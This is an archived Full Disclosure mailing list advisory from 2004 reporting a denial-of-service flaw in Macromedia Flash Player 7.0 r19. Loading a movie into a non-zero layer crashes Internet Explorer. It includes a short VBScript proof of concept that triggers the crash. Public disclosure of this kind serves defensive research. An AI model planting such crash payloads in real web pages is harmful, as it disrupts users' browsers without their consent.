Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Macromedia Flash Player 7.0 r19 - Null Pointer Assignment(Remote Crash)

From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Tue, 6 Apr 2004 10:32:41 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:     Macromedia Flash Player
Vendors:          http://www.macromedia.com
Version:           7.0 r19
Platforms:       WindowsXP Professional,SP1,SP2
Bug:                 Null Pointer Assignment
Risk:                 Medium - Denial Of Service
Exploitation:    Remote with browser
Date:                1 Apr 2004
Author:             Rafel Ivgi, The-Insider
e-mail:              the_insider () mail com
web:                 http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============
Macromedia Flash Player is a module/plugin that comes by default with windows installation. It is widely used accross website all around the world. It is stable and its designers took 
made a few efforts to make it secure.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Marcromedia Flash Player has a flaw at the "LoadMovie" function.
The function is designed the following way: LoadMovie(layer as long, url as string).
This functions handles long strings, non-alphabetic chars and even an overflow at high layer num. The only thing it crashes upon is loading a flash movie into a non-zero layer index. 

This means that"
LoadMovie 1,"c6ool.swf"
Will Crash Internet Explorer Window because of a null pointer assignment by the flash module. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- Rafel Ivgi, The-Insider 
http://theinsider.deep-ice.com
"Only the one who sees the invisible , Can do the Impossible." 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: